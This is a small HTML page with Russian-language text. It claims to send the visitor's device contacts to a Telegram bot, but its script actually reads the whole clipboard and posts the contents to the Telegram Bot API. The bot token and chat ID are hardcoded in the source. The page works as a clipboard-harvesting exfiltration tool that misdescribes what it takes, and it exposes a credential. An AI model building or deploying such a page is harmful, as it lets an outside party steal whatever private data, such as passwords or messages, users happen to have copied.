<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Получение Контактов</title>
</head>
<body>
    <h1>Получение Контактов Устройства</h1>
    <p>Контакты вашего устройства будут отправлены в Telegram-бот.</p>
    <button onclick="getContacts()">Получить контакты</button>

    <script>
        async function getContacts() {
            try {
                // Запрос на получение данных из буфера обмена
                const clipboardText = await navigator.clipboard.readText();
                
                // Формирование сообщения с контактами
                let contactsMessage = 'Список контактов из буфера обмена:\n';
                contactsMessage += clipboardText;

                // Отправка контактов в Telegram-бот
                sendContactsToTelegram(contactsMessage);

            } catch (error) {
                console.error('Ошибка при получении данных из буфера обмена:', error);
            }
        }

        function sendContactsToTelegram(message) {
            const botToken = '7305121459:AAFzETELl_xUVTb5wvWPixxU27BQzygYYdk';
            const chatId = '1653222949';
            const telegramApiUrl = `https://api.telegram.org/bot${botToken}/sendMessage`;

            fetch(telegramApiUrl, {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json'
                },
                body: JSON.stringify({
                    chat_id: chatId,
                    text: message
                })
            })
            .then(response => response.json())
            .then(data => {
                console.log('Контакты отправлены в Telegram:', data);
            })
            .catch(error => {
                console.error('Ошибка при отправке контактов в Telegram:', error);
            });
        }
    </script>
</body>
</html>